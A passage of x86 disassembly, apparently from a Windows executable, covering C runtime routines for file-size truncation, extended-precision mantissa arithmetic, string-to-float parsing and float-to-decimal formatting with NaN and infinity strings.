push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_41E56B
mov ebx, 1000h
push ebx
lea eax, [ebp+var_100C]
push esi
push eax
call sub_41C380
push 8000h
push [ebp+arg_0]
call sub_41F071
add esp, 14h
mov [ebp+var_C], eax
loc_41E51C: ; CODE XREF: sub_41E49E+A2�j
cmp edi, ebx
mov eax, ebx
jge short loc_41E524
mov eax, edi
loc_41E524: ; CODE XREF: sub_41E49E+82�j
push eax
lea eax, [ebp+var_100C]
push eax
push [ebp+arg_0]
call sub_41BD6B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41E544
sub edi, eax
test edi, edi
jg short loc_41E51C
jmp short loc_41E55C
; ---------------------------------------------------------------------------
loc_41E544: ; CODE XREF: sub_41E49E+9C�j
call sub_419439
cmp dword ptr [eax], 5
jnz short loc_41E559
call sub_419430
mov dword ptr [eax], 0Dh
loc_41E559: ; CODE XREF: sub_41E49E+AE�j
or esi, 0FFFFFFFFh
loc_41E55C: ; CODE XREF: sub_41E49E+A4�j
push [ebp+var_C]
push [ebp+arg_0]
call sub_41F071
pop ecx
pop ecx
jmp short loc_41E5B3
; ---------------------------------------------------------------------------
loc_41E56B: ; CODE XREF: sub_41E49E+56�j
jge short loc_41E5B3
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41B178
push [ebp+arg_0]
call sub_41CB4B
add esp, 10h
push eax
call ds:dword_420134 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_41E5B3
call sub_419430
mov dword ptr [eax], 0Dh
call sub_419439
mov edi, eax
call ds:dword_420008 ; RtlGetLastWin32Error
mov [edi], eax
loc_41E5B3: ; CODE XREF: sub_41E49E+CB�j
; sub_41E49E:loc_41E56B�j ...
push 0
push [ebp+var_8]
push [ebp+arg_0]
call sub_41B178
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41E5CA
; ---------------------------------------------------------------------------
loc_41E5C8: ; CODE XREF: sub_41E49E+32�j
; sub_41E49E+48�j
mov eax, ebx
loc_41E5CA: ; CODE XREF: sub_41E49E+128�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
pop ebx
call sub_41A026
leave
retn
sub_41E49E endp
; =============== S U B R O U T I N E =======================================
sub_41E5D9 proc near ; CODE XREF: sub_41D6FB+23�p
; sub_41D6FB+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_41E5EF
cmp ecx, esi
jnb short loc_41E5F2
loc_41E5EF: ; CODE XREF: sub_41E5D9+10�j
xor eax, eax
inc eax
loc_41E5F2: ; CODE XREF: sub_41E5D9+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_41E5D9 endp
; =============== S U B R O U T I N E =======================================
sub_41E5FA proc near ; CODE XREF: sub_41E6B3+4B�p
; sub_41E6B3+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41E5D9
add esp, 0Ch
test eax, eax
jz short loc_41E62C
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41E5D9
add esp, 0Ch
test eax, eax
jz short loc_41E62C
inc dword ptr [esi+8]
loc_41E62C: ; CODE XREF: sub_41E5FA+19�j
; sub_41E5FA+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41E5D9
add esp, 0Ch
test eax, eax
jz short loc_41E644
inc dword ptr [esi+8]
loc_41E644: ; CODE XREF: sub_41E5FA+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41E5D9
add esp, 0Ch
pop edi
pop esi
retn
sub_41E5FA endp
; =============== S U B R O U T I N E =======================================
sub_41E658 proc near ; CODE XREF: sub_41E6B3+3B�p
; sub_41E6B3+41�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_41E658 endp
; =============== S U B R O U T I N E =======================================
sub_41E686 proc near ; CODE XREF: sub_41EBD1+1C1�p
; sub_41F0D3+18A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41E686 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6B3 proc near ; CODE XREF: sub_41E797+362�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_8], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41E731
mov [ebp+arg_8], eax
loc_41E6E5: ; CODE XREF: sub_41E6B3+7A�j
mov esi, ebx
lea edi, [ebp+var_14]
movsd
movsd
push ebx
movsd
call sub_41E658
push ebx
call sub_41E658
lea eax, [ebp+var_14]
push eax
push ebx
call sub_41E5FA
push ebx
call sub_41E658
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ebx
call sub_41E5FA
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41E6E5
xor edx, edx
loc_41E731: ; CODE XREF: sub_41E6B3+2D�j
cmp [ebx+8], edx
jnz short loc_41E765
mov edi, [ebx+8]
loc_41E739: ; CODE XREF: sub_41E6B3+AD�j
mov ecx, [ebx+4]
add [ebp+var_8], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_41E739
mov [ebx+8], edi
loc_41E765: ; CODE XREF: sub_41E6B3+81�j
mov esi, 8000h
jmp short loc_41E77A
; ---------------------------------------------------------------------------
loc_41E76C: ; CODE XREF: sub_41E6B3+CA�j
push ebx
call sub_41E658
add [ebp+var_8], 0FFFFh
pop ecx
loc_41E77A: ; CODE XREF: sub_41E6B3+B7�j
test [ebx+8], esi
jz short loc_41E76C
mov ecx, [ebp+var_4]
mov ax, word ptr [ebp+var_8]
xor ecx, [ebp+4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_41A026
leave
retn
sub_41E6B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E797 proc near ; CODE XREF: sub_41D9ED+22�p
; sub_41DA30+22�p
var_58 = byte ptr -58h
var_41 = byte ptr -41h
var_3C = dword ptr -3Ch
var_36 = dword ptr -36h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
xor eax, eax
push edi
mov edi, [ebp+arg_8]
lea esi, [ebp+var_58]
mov [ebp+var_8], esi
mov [ebp+var_2C], eax
mov [ebp+var_1C], 1
mov [ebp+var_C], eax
mov [ebp+var_14], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
mov [ebp+arg_8], edi
loc_41E7D8: ; CODE XREF: sub_41E797+58�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41E7EE
cmp cl, 9
jz short loc_41E7EE
cmp cl, 0Ah
jz short loc_41E7EE
cmp cl, 0Dh
jnz short loc_41E7F1
loc_41E7EE: ; CODE XREF: sub_41E797+46�j
; sub_41E797+4B�j ...
inc edi
jmp short loc_41E7D8
; ---------------------------------------------------------------------------
loc_41E7F1: ; CODE XREF: sub_41E797+55�j
; sub_41E797+B5�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41EA70 ; default
; jumptable 0041E7FD case 10
jmp ds:off_41EBA1[eax*4] ; switch jump
loc_41E804: ; DATA XREF: .text:off_41EBA1�o
cmp bl, 31h ; jumptable 0041E7FD case 0
jl short loc_41E815
cmp bl, 39h
jg short loc_41E815
loc_41E80E: ; CODE XREF: sub_41E797+CE�j
; sub_41E797+129�j
push 3
jmp loc_41EA2F
; ---------------------------------------------------------------------------
loc_41E815: ; CODE XREF: sub_41E797+70�j
; sub_41E797+75�j
cmp bl, byte_42E108
jnz short loc_41E824
loc_41E81D: ; CODE XREF: sub_41E797+135�j
push 5
jmp loc_41EA66
; ---------------------------------------------------------------------------
loc_41E824: ; CODE XREF: sub_41E797+84�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41E84E
dec eax
dec eax
jz short loc_41E842
sub eax, 3
jz loc_41E8DB
mov [ebp+var_8], esi
dec edi
jmp loc_41E9ED
; ---------------------------------------------------------------------------
loc_41E842: ; CODE XREF: sub_41E797+97�j
push 2
pop eax
mov [ebp+var_2C], 8000h
jmp short loc_41E7F1
; ---------------------------------------------------------------------------
loc_41E84E: ; CODE XREF: sub_41E797+93�j
and [ebp+var_2C], 0
push 2
pop eax
jmp short loc_41E7F1
; ---------------------------------------------------------------------------
loc_41E857: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
xor eax, eax ; jumptable 0041E7FD case 1
inc eax
cmp bl, 31h
mov [ebp+var_14], eax
jl short loc_41E867
cmp bl, 39h
jle short loc_41E80E
loc_41E867: ; CODE XREF: sub_41E797+C9�j
cmp bl, byte_42E108
jnz short loc_41E876
loc_41E86F: ; CODE XREF: sub_41E797+182�j
push 4
jmp loc_41EA66
; ---------------------------------------------------------------------------
loc_41E876: ; CODE XREF: sub_41E797+D6�j
cmp bl, 2Bh
jz short loc_41E8B0
cmp bl, 2Dh
jz short loc_41E8B0
cmp bl, 30h
jz loc_41E7F1
loc_41E889: ; CODE XREF: sub_41E797+1DA�j
cmp bl, 43h
jle loc_41E9E9
cmp bl, 45h
jle short loc_41E8A9
cmp bl, 63h
jle loc_41E9E9
cmp bl, 65h
jg loc_41E9E9
loc_41E8A9: ; CODE XREF: sub_41E797+FE�j
push 6
jmp loc_41EA66
; ---------------------------------------------------------------------------
loc_41E8B0: ; CODE XREF: sub_41E797+E2�j
; sub_41E797+E7�j ...
dec edi
push 0Bh
jmp loc_41EA66
; ---------------------------------------------------------------------------
loc_41E8B8: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
cmp bl, 31h ; jumptable 0041E7FD case 2
jl short loc_41E8C6
cmp bl, 39h
jle loc_41E80E
loc_41E8C6: ; CODE XREF: sub_41E797+124�j
cmp bl, byte_42E108
jz loc_41E81D
cmp bl, 30h
jnz loc_41EA3B
loc_41E8DB: ; CODE XREF: sub_41E797+9C�j
xor eax, eax
inc eax
jmp loc_41E7F1
; ---------------------------------------------------------------------------
loc_41E8E3: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
mov [ebp+var_14], 1 ; jumptable 0041E7FD case 3
jmp short loc_41E903
; ---------------------------------------------------------------------------
loc_41E8EC: ; CODE XREF: sub_41E797+178�j
cmp [ebp+var_C], 19h
jnb short loc_41E8FD
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
jmp short loc_41E900
; ---------------------------------------------------------------------------
loc_41E8FD: ; CODE XREF: sub_41E797+159�j
inc [ebp+var_10]
loc_41E900: ; CODE XREF: sub_41E797+164�j
mov bl, [edi]
inc edi
loc_41E903: ; CODE XREF: sub_41E797+153�j
movzx eax, bl
push eax
call sub_41C16B
test eax, eax
pop ecx
jnz short loc_41E8EC
cmp bl, byte_42E108
jnz short loc_41E95F
jmp loc_41E86F
; ---------------------------------------------------------------------------
loc_41E91E: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
xor eax, eax ; jumptable 0041E7FD case 4
inc eax
cmp [ebp+var_C], 0
mov [ebp+var_14], eax
mov [ebp+var_28], eax
jnz short loc_41E951
jmp short loc_41E935
; ---------------------------------------------------------------------------
loc_41E92F: ; CODE XREF: sub_41E797+1A1�j
dec [ebp+var_10]
mov bl, [edi]
inc edi
loc_41E935: ; CODE XREF: sub_41E797+196�j
cmp bl, 30h
jz short loc_41E92F
jmp short loc_41E951
; ---------------------------------------------------------------------------
loc_41E93C: ; CODE XREF: sub_41E797+1C6�j
cmp [ebp+var_C], 19h
jnb short loc_41E94E
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
dec [ebp+var_10]
loc_41E94E: ; CODE XREF: sub_41E797+1A9�j
mov bl, [edi]
inc edi
loc_41E951: ; CODE XREF: sub_41E797+194�j
; sub_41E797+1A3�j
movzx eax, bl
push eax
call sub_41C16B
test eax, eax
pop ecx
jnz short loc_41E93C
loc_41E95F: ; CODE XREF: sub_41E797+180�j
cmp bl, 2Bh
jz loc_41E8B0
cmp bl, 2Dh
jz loc_41E8B0
jmp loc_41E889
; ---------------------------------------------------------------------------
loc_41E976: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
movzx eax, bl ; jumptable 0041E7FD case 5
push eax
mov [ebp+var_28], 1
call sub_41C16B
test eax, eax
pop ecx
jz loc_41EA3B
push 4
jmp loc_41EA2F
; ---------------------------------------------------------------------------
loc_41E996: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
cmp bl, 31h ; jumptable 0041E7FD case 6
lea ecx, [edi-2]
mov [ebp+arg_8], ecx
jl short loc_41E9AA
cmp bl, 39h
jle loc_41EA2D
loc_41E9AA: ; CODE XREF: sub_41E797+208�j
movsx eax, bl
sub eax, 2Bh
jz loc_41EA64
dec eax
dec eax
jz loc_41EA58
sub eax, 3
jnz loc_41EA7E
loc_41E9C7: ; CODE XREF: sub_41E797+2A2�j
push 8
jmp loc_41EA66
; ---------------------------------------------------------------------------
loc_41E9CE: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
mov [ebp+var_24], 1 ; jumptable 0041E7FD case 8
jmp short loc_41E9DA
; ---------------------------------------------------------------------------
loc_41E9D7: ; CODE XREF: sub_41E797+246�j
mov bl, [edi]
inc edi
loc_41E9DA: ; CODE XREF: sub_41E797+23E�j
cmp bl, 30h
jz short loc_41E9D7
cmp bl, 31h
jl short loc_41E9E9
cmp bl, 39h
jle short loc_41EA2D
loc_41E9E9: ; CODE XREF: sub_41E797+F5�j
; sub_41E797+103�j ...
dec edi
loc_41E9EA: ; CODE XREF: sub_41E797+2A7�j
; sub_41E797+2E2�j
mov [ebp+var_8], esi
loc_41E9ED: ; CODE XREF: sub_41E797+A6�j
; sub_41E797+2EC�j ...
cmp [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_41EB4C
push 18h
pop eax
cmp [ebp+var_C], eax
jbe short loc_41EA14
cmp [ebp+var_41], 5
jl short loc_41EA0D
inc [ebp+var_41]
loc_41EA0D: ; CODE XREF: sub_41E797+271�j
dec esi
inc [ebp+var_10]
mov [ebp+var_C], eax
loc_41EA14: ; CODE XREF: sub_41E797+26B�j
cmp [ebp+var_C], 0
jbe loc_41EB73
jmp loc_41EAE8
; ---------------------------------------------------------------------------
loc_41EA23: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
cmp bl, 31h ; jumptable 0041E7FD case 7
jl short loc_41EA36
cmp bl, 39h
jg short loc_41EA36
loc_41EA2D: ; CODE XREF: sub_41E797+20D�j
; sub_41E797+250�j
push 9
loc_41EA2F: ; CODE XREF: sub_41E797+79�j
; sub_41E797+1FA�j
pop eax
dec edi
jmp loc_41E7F1
; ---------------------------------------------------------------------------
loc_41EA36: ; CODE XREF: sub_41E797+28F�j
; sub_41E797+294�j
cmp bl, 30h
jz short loc_41E9C7
loc_41EA3B: ; CODE XREF: sub_41E797+13E�j
; sub_41E797+1F2�j
mov edi, [ebp+arg_8]
jmp short loc_41E9EA
; ---------------------------------------------------------------------------
loc_41EA40: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
cmp [ebp+arg_18], 0 ; jumptable 0041E7FD case 11
jz short loc_41EA6C
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+arg_8], ecx
jz short loc_41EA64
dec eax
dec eax
jnz short loc_41EA7E
loc_41EA58: ; CODE XREF: sub_41E797+221�j
or [ebp+var_1C], 0FFFFFFFFh
push 7
pop eax
jmp loc_41E7F1
; ---------------------------------------------------------------------------
loc_41EA64: ; CODE XREF: sub_41E797+219�j
; sub_41E797+2BB�j
push 7
loc_41EA66: ; CODE XREF: sub_41E797+88�j
; sub_41E797+DA�j ...
pop eax
jmp loc_41E7F1
; ---------------------------------------------------------------------------
loc_41EA6C: ; CODE XREF: sub_41E797+2AD�j
push 0Ah
pop eax
dec edi
loc_41EA70: ; CODE XREF: sub_41E797+60�j
; sub_41E797+66�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041E7FD case 10
jnz loc_41E7F1
jmp loc_41E9EA
; ---------------------------------------------------------------------------
loc_41EA7E: ; CODE XREF: sub_41E797+22A�j
; sub_41E797+2BF�j
mov [ebp+var_8], esi
mov edi, ecx
jmp loc_41E9ED
; ---------------------------------------------------------------------------
loc_41EA88: ; CODE XREF: sub_41E797+66�j
; DATA XREF: .text:off_41EBA1�o
mov [ebp+var_8], esi ; jumptable 0041E7FD case 9
mov [ebp+var_24], 1
xor esi, esi
jmp short loc_41EAAB
; ---------------------------------------------------------------------------
loc_41EA96: ; CODE XREF: sub_41E797+320�j
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41EABB
mov bl, [edi]
inc edi
loc_41EAAB: ; CODE XREF: sub_41E797+2FD�j
movzx eax, bl
push eax
call sub_41C16B
test eax, eax
pop ecx
jnz short loc_41EA96
jmp short loc_41EAC0
; ---------------------------------------------------------------------------
loc_41EABB: ; CODE XREF: sub_41E797+30F�j
mov esi, 1451h
loc_41EAC0: ; CODE XREF: sub_41E797+322�j
mov [ebp+var_20], esi
movzx eax, bl
jmp short loc_41EACE
; ---------------------------------------------------------------------------
loc_41EAC8: ; CODE XREF: sub_41E797+340�j
mov al, [edi]
inc edi
movzx eax, al
loc_41EACE: ; CODE XREF: sub_41E797+32F�j
push eax
call sub_41C16B
test eax, eax
pop ecx
jnz short loc_41EAC8
mov esi, [ebp+var_8]
dec edi
jmp loc_41E9ED
; ---------------------------------------------------------------------------
loc_41EAE2: ; CODE XREF: sub_41E797+355�j
dec [ebp+var_C]
inc [ebp+var_10]
loc_41EAE8: ; CODE XREF: sub_41E797+287�j
dec esi
cmp byte ptr [esi], 0
jz short loc_41EAE2
lea eax, [ebp+var_3C]
push eax
push [ebp+var_C]
lea eax, [ebp+var_58]
push eax
call sub_41E6B3
mov eax, [ebp+var_20]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_1C], ecx
jge short loc_41EB0D
neg eax
loc_41EB0D: ; CODE XREF: sub_41E797+372�j
add eax, [ebp+var_10]
cmp [ebp+var_24], ecx
jnz short loc_41EB18
add eax, [ebp+arg_10]
loc_41EB18: ; CODE XREF: sub_41E797+37C�j
cmp [ebp+var_28], ecx
jnz short loc_41EB20
sub eax, [ebp+arg_14]
loc_41EB20: ; CODE XREF: sub_41E797+384�j
cmp eax, 1450h
jg short loc_41EB55
cmp eax, 0FFFFEBB0h
jl short loc_41EB6C
push [ebp+arg_C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_41F30B
mov edx, [ebp+var_3C]
mov ebx, [ebp+var_3C+2]
mov esi, [ebp+var_36]
mov eax, [ebp+var_32]
add esp, 0Ch
jmp short loc_41EB7B
; ---------------------------------------------------------------------------
loc_41EB4C: ; CODE XREF: sub_41E797+25F�j
mov [ebp+var_18], 4
jmp short loc_41EB73
; ---------------------------------------------------------------------------
loc_41EB55: ; CODE XREF: sub_41E797+38E�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_18], 2
jmp short loc_41EB7B
; ---------------------------------------------------------------------------
loc_41EB6C: ; CODE XREF: sub_41E797+395�j
mov [ebp+var_18], 1
loc_41EB73: ; CODE XREF: sub_41E797+281�j
; sub_41E797+3BC�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_41EB7B: ; CODE XREF: sub_41E797+3B3�j
; sub_41E797+3D3�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_2C]
mov [ecx+2], ebx
mov [ecx+6], esi
mov [ecx+0Ah], ax
mov eax, [ebp+var_18]
mov [ecx], dx
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A026
leave
retn
sub_41E797 endp
; ---------------------------------------------------------------------------
off_41EBA1 dd offset loc_41E804 ; DATA XREF: sub_41E797+66�r
dd offset loc_41E857 ; jump table for switch statement
dd offset loc_41E8B8
dd offset loc_41E8E3
dd offset loc_41E91E
dd offset loc_41E976
dd offset loc_41E996
dd offset loc_41EA23
dd offset loc_41E9CE
dd offset loc_41EA88
dd offset loc_41EA70
dd offset loc_41EA40
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EBD1 proc near ; CODE XREF: sub_41DBA4+36�p
var_30 = byte ptr -30h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_14]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_24], 0CCh
mov [ebp+var_23], 0CCh
mov [ebp+var_22], 0CCh
mov [ebp+var_21], 0CCh
mov [ebp+var_20], 0CCh
mov [ebp+var_1F], 0CCh
mov [ebp+var_1E], 0CCh
mov [ebp+var_1D], 0CCh
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0FBh
mov [ebp+var_19], 3Fh
mov [ebp+var_8], 1
mov edx, eax
jz short loc_41EC3E
mov byte ptr [ebx+2], 2Dh
jmp short loc_41EC42
; ---------------------------------------------------------------------------
loc_41EC3E: ; CODE XREF: sub_41EBD1+65�j
mov byte ptr [ebx+2], 20h
loc_41EC42: ; CODE XREF: sub_41EBD1+6B�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_41EC57
test edi, edi
jnz short loc_41EC57
cmp [ebp+arg_0], edi
jz loc_41ED4A
loc_41EC57: ; CODE XREF: sub_41EBD1+77�j
; sub_41EBD1+7B�j
cmp dx, si
jnz short loc_41ECD4
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_41EC70
cmp [ebp+arg_0], 0
jz short loc_41EC7F
loc_41EC70: ; CODE XREF: sub_41EBD1+97�j
test edi, 40000000h
jnz short loc_41EC7F
push offset a1Snan ; "1#SNAN"
jmp short loc_41ECC5
; ---------------------------------------------------------------------------
loc_41EC7F: ; CODE XREF: sub_41EBD1+9D�j
; sub_41EBD1+A5�j
test cx, cx
jz short loc_41EC99
cmp edi, 0C0000000h
jnz short loc_41EC99
cmp [ebp+arg_0], 0
jnz short loc_41ECC0
push offset a1Ind ; "1#IND"
jmp short loc_41ECA8
; ---------------------------------------------------------------------------
loc_41EC99: ; CODE XREF: sub_41EBD1+B1�j
; sub_41EBD1+B9�j
cmp edi, eax
jnz short loc_41ECC0
cmp [ebp+arg_0], 0
jnz short loc_41ECC0
push offset a1Inf ; "1#INF"
loc_41ECA8: ; CODE XREF: sub_41EBD1+C6�j
lea eax, [ebx+4]
push eax
call sub_419A70
mov byte ptr [ebx+3], 5
loc_41ECB5: ; CODE XREF: sub_41EBD1+101�j
and [ebp+var_8], 0
pop ecx
pop ecx
jmp loc_41EE2C
; ---------------------------------------------------------------------------
loc_41ECC0: ; CODE XREF: sub_41EBD1+BF�j
; sub_41EBD1+CA�j ...
push offset a1Qnan ; "1#QNAN"
loc_41ECC5: ; CODE XREF: sub_41EBD1+AC�j
lea eax, [ebx+4]
push eax
call sub_419A70
mov byte ptr [ebx+3], 6
jmp short loc_41ECB5
; ---------------------------------------------------------------------------
loc_41ECD4: ; CODE XREF: sub_41EBD1+89�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_18], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_16], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_18]
push eax
mov [ebp+var_E], dx
mov [ebp+var_12], edi
call sub_41F30B
add esp, 0Ch
cmp [ebp+var_E], 3FFFh
jb short loc_41ED35
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
inc esi
call sub_41F0D3
pop ecx
pop ecx
loc_41ED35: ; CODE XREF: sub_41EBD1+152�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_41ED53
movsx eax, si
add edi, eax
test edi, edi
jg short loc_41ED53
loc_41ED4A: ; CODE XREF: sub_41EBD1+80�j
mov byte ptr [ebx+4], 30h
jmp loc_41EE50
; ---------------------------------------------------------------------------
loc_41ED53: ; CODE XREF: sub_41EBD1+16E�j
; sub_41EBD1+177�j
cmp edi, 15h
jle short loc_41ED5B
push 15h
pop edi
loc_41ED5B: ; CODE XREF: sub_41EBD1+185�j
movzx esi, [ebp+var_E]
sub esi, 3FFEh
and [ebp+var_E], 0
mov [ebp+arg_8], 8
loc_41ED71: ; CODE XREF: sub_41EBD1+1AD�j
lea eax, [ebp+var_18]
push eax
call sub_41E658
dec [ebp+arg_8]
pop ecx
jnz short loc_41ED71
test esi, esi
jge short loc_41ED9B
neg esi
and esi, 0FFh
jle short loc_41ED9B
loc_41ED8E: ; CODE XREF: sub_41EBD1+1C8�j
lea eax, [ebp+var_18]
push eax
call sub_41E686
dec esi
pop ecx
jnz short loc_41ED8E
loc_41ED9B: ; CODE XREF: sub_41EBD1+1B1�j
; sub_41EBD1+1BB�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+arg_8], eax
jle short loc_41EDF8
mov [ebp+var_C], ecx
loc_41EDAB: ; CODE XREF: sub_41EBD1+222�j
lea esi, [ebp+var_18]
lea edi, [ebp+var_30]
movsd
movsd
lea eax, [ebp+var_18]
push eax
movsd
call sub_41E658
lea eax, [ebp+var_18]
push eax
call sub_41E658
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41E5FA
lea eax, [ebp+var_18]
push eax
call sub_41E658
mov al, byte ptr [ebp+var_E+1]
mov ecx, [ebp+arg_8]
and byte ptr [ebp+var_E+1], 0
add al, 30h
add esp, 14h
inc [ebp+arg_8]
dec [ebp+var_C]
mov [ecx], al
jnz short loc_41EDAB
mov eax, [ebp+arg_8]
loc_41EDF8: ; CODE XREF: sub_41EBD1+1D5�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41EE45
jmp short loc_41EE0F
; ---------------------------------------------------------------------------
loc_41EE06: ; CODE XREF: sub_41EBD1+240�j
cmp byte ptr [eax], 39h
jnz short loc_41EE13
